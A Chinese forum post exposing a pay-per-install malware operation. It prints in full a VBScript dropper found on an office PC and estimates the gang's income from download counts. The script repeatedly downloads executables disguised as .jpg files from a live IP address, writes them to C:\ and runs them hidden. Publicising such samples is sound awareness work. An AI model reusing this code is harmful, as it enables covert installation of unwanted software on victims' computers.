分享一个截获到的月入百万病毒营销团伙的代码
事情要从办公室一同事的机子说起。。
某天发现电脑无缘无故被安装了N多垃圾软件,帮他检查发现C盘多了这么多东西。。
<ignore_js_op>
而且还有一个可疑的文件
<ignore_js_op>
打开之后发现如下代码:
本帖隐藏的内容
on error resume next iLocal=LCase(Wscript.Arguments(1)) iRemote=LCase(Wscript.Arguments(0)) iUser=LCase(Wscript.Arguments(2)) iPass=LCase(Wscript.Arguments(3)) set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP") if iUser="" and iPass="" then xPost.Open "GET","http://115.47.57.43:2015/bd.jpg",0 '目测这个是恶意软件的服务器地址,服务器上的文件名是jpg格式 else xPost.Open "GET",iRemote,0,iUser,iPass end if xPost.Send() set sGet=CreateObject("ADODB.Stream") sGet.Mode=3 sGet.Type=1 sGet.Open() sGet.Write xPost.ResponseBody sGet.SaveToFile "C:\Baidusd_OnlineSetup_sid_30084_silent.exe",2 '下载文件时顺便改成exe格式 Wscript.Sleep 3000 Set objShell = CreateObject("Wscript.Shell") objShell.Run "C:\Baidusd_OnlineSetup_sid_30084_silent.exe", 0 '运行安装 Wscript.Sleep 1000 on error resume next iLocal=LCase(Wscript.Arguments(1)) iRemote=LCase(Wscript.Arguments(0)) iUser=LCase(Wscript.Arguments(2)) iPass=LCase(Wscript.Arguments(3)) set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP") if iUser="" and iPass="" then xPost.Open "GET","http://115.47.57.43:2015/lf.jpg",0 '继续重复上面的操作,下载另一个垃圾软件 else xPost.Open "GET",iRemote,0,iUser,iPass end if xPost.Send() set sGet=CreateObject("ADODB.Stream") sGet.Mode=3 sGet.Type=1 sGet.Open() sGet.Write xPost.ResponseBody sGet.SaveToFile "C:\21230_lf.exe",2 Wscript.Sleep 3000 Set objShell = CreateObject("Wscript.Shell") objShell.Run "C:\21230_lf.exe", 0 Wscript.Sleep 1000 on error resume next iLocal=LCase(Wscript.Arguments(1)) iRemote=LCase(Wscript.Arguments(0)) iUser=LCase(Wscript.Arguments(2)) iPass=LCase(Wscript.Arguments(3)) set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP") if iUser="" and iPass="" then xPost.Open "GET","http://115.47.57.43:2015/wj.jpg",0 else xPost.Open "GET",iRemote,0,iUser,iPass end if xPost.Send() set sGet=CreateObject("ADODB.Stream") sGet.Mode=3 sGet.Type=1 sGet.Open() sGet.Write xPost.ResponseBody sGet.SaveToFile "C:\setup_open_3354.exe",2 Wscript.Sleep 3000 Set objShell = CreateObject("Wscript.Shell") objShell.Run "C:\setup_open_3354.exe", 0 Wscript.Sleep 1000 on error resume next iLocal=LCase(Wscript.Arguments(1)) iRemote=LCase(Wscript.Arguments(0)) iUser=LCase(Wscript.Arguments(2)) iPass=LCase(Wscript.Arguments(3)) set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP") if iUser="" and iPass="" then xPost.Open "GET","http://115.47.57.43:2015/db.jpg",0 else xPost.Open "GET",iRemote,0,iUser,iPass end if xPost.Send() set sGet=CreateObject("ADODB.Stream") sGet.Mode=3 sGet.Type=1 sGet.Open() sGet.Write xPost.ResponseBody sGet.SaveToFile "C:\KINSTALLERS_74_2370.exe",2 Wscript.Sleep 3000 Set objShell = CreateObject("Wscript.Shell") objShell.Run "C:\KINSTALLERS_74_2370.exe", 0 Wscript.Sleep 1000 on error resume next iLocal=LCase(Wscript.Arguments(1)) iRemote=LCase(Wscript.Arguments(0)) iUser=LCase(Wscript.Arguments(2)) iPass=LCase(Wscript.Arguments(3)) set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP") if iUser="" and iPass="" then xPost.Open "GET","http://115.47.57.43:2015/pp.jpg",0 else xPost.Open "GET",iRemote,0,iUser,iPass end if xPost.Send() set sGet=CreateObject("ADODB.Stream") sGet.Mode=3 sGet.Type=1 sGet.Open() sGet.Write xPost.ResponseBody sGet.SaveToFile "C:\paopao_20.exe",2 Wscript.Sleep 3000 Set objShell = CreateObject("Wscript.Shell") objShell.Run "C:\paopao_20.exe", 0 Wscript.Sleep 1000 on error resume next iLocal=LCase(Wscript.Arguments(1)) iRemote=LCase(Wscript.Arguments(0)) iUser=LCase(Wscript.Arguments(2)) iPass=LCase(Wscript.Arguments(3)) set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP") if iUser="" and iPass="" then xPost.Open "GET","http://115.47.57.43:2015/FX.jpg",0 else xPost.Open "GET",iRemote,0,iUser,iPass end if xPost.Send() set sGet=CreateObject("ADODB.Stream") sGet.Mode=3 sGet.Type=1 sGet.Open() sGet.Write xPost.ResponseBody sGet.SaveToFile "C:\FunshionInstall_C170827.exe",2 Wscript.Sleep 3000 Set objShell = CreateObject("Wscript.Shell") objShell.Run "C:\FunshionInstall_C170827.exe", 0 Wscript.Sleep 1000 on error resume next iLocal=LCase(Wscript.Arguments(1)) iRemote=LCase(Wscript.Arguments(0)) iUser=LCase(Wscript.Arguments(2)) iPass=LCase(Wscript.Arguments(3)) set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP") if iUser="" and iPass="" then xPost.Open "GET","http://115.47.57.43:2015/wj.jpg",0 else xPost.Open "GET",iRemote,0,iUser,iPass end if xPost.Send() set sGet=CreateObject("ADODB.Stream") sGet.Mode=3 sGet.Type=1 sGet.Open() sGet.Write xPost.ResponseBody sGet.SaveToFile "C:\setup_open_3333.exe",2 Wscript.Sleep 3000 Set objShell = CreateObject("Wscript.Shell") objShell.Run "C:\setup_open_3333.exe", 0 Wscript.Sleep 1000 on error resume next iLocal=LCase(Wscript.Arguments(1)) iRemote=LCase(Wscript.Arguments(0)) iUser=LCase(Wscript.Arguments(2)) iPass=LCase(Wscript.Arguments(3)) set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP") if iUser="" and iPass="" then xPost.Open "GET","http://115.47.57.43:2015/db.jpg",0 else xPost.Open "GET",iRemote,0,iUser,iPass end if xPost.Send() set sGet=CreateObject("ADODB.Stream") sGet.Mode=3 sGet.Type=1 sGet.Open() sGet.Write xPost.ResponseBody sGet.SaveToFile "C:\KINSTALLERS_74_2366.exe",2 Wscript.Sleep 3000 Set objShell = CreateObject("Wscript.Shell") objShell.Run "C:\KINSTALLERS_74_2366.exe", 0 Wscript.Sleep 1000 on error resume next iLocal=LCase(Wscript.Arguments(1)) iRemote=LCase(Wscript.Arguments(0)) iUser=LCase(Wscript.Arguments(2)) iPass=LCase(Wscript.Arguments(3)) set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP") if iUser="" and iPass="" then xPost.Open "GET","http://115.47.57.43:2015/pp.jpg",0 else xPost.Open "GET",iRemote,0,iUser,iPass end if xPost.Send() set sGet=CreateObject("ADODB.Stream") sGet.Mode=3 sGet.Type=1 sGet.Open() sGet.Write xPost.ResponseBody sGet.SaveToFile "C:\paopao_19.exe",2 Wscript.Sleep 3000 Set objShell = CreateObject("Wscript.Shell") objShell.Run "C:\paopao_19.exe", 0 Wscript.Sleep 1000 on error resume next iLocal=LCase(Wscript.Arguments(1)) iRemote=LCase(Wscript.Arguments(0)) iUser=LCase(Wscript.Arguments(2)) iPass=LCase(Wscript.Arguments(3)) set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP") if iUser="" and iPass="" then xPost.Open "GET","http://115.47.57.43:2015/db.jpg",0 else xPost.Open "GET",iRemote,0,iUser,iPass end if xPost.Send() set sGet=CreateObject("ADODB.Stream") sGet.Mode=3 sGet.Type=1 sGet.Open() sGet.Write xPost.ResponseBody sGet.SaveToFile "C:\KINSTALLERS_74_2492.exe",2 Wscript.Sleep 3000 Set objShell = CreateObject("Wscript.Shell") objShell.Run "C:\KINSTALLERS_74_2492.exe", 0 Wscript.Sleep 1000
上去他们的服务器看了下
<ignore_js_op>
看看他们的下载量,粗略的计算下
下载量约为19万次,按照每个软件5元计算,最早的文件是22号上传的.到现在不到一个月.直接收入接近100万!可见病毒营销是有多牛
T

浙公网安备 33010602011771号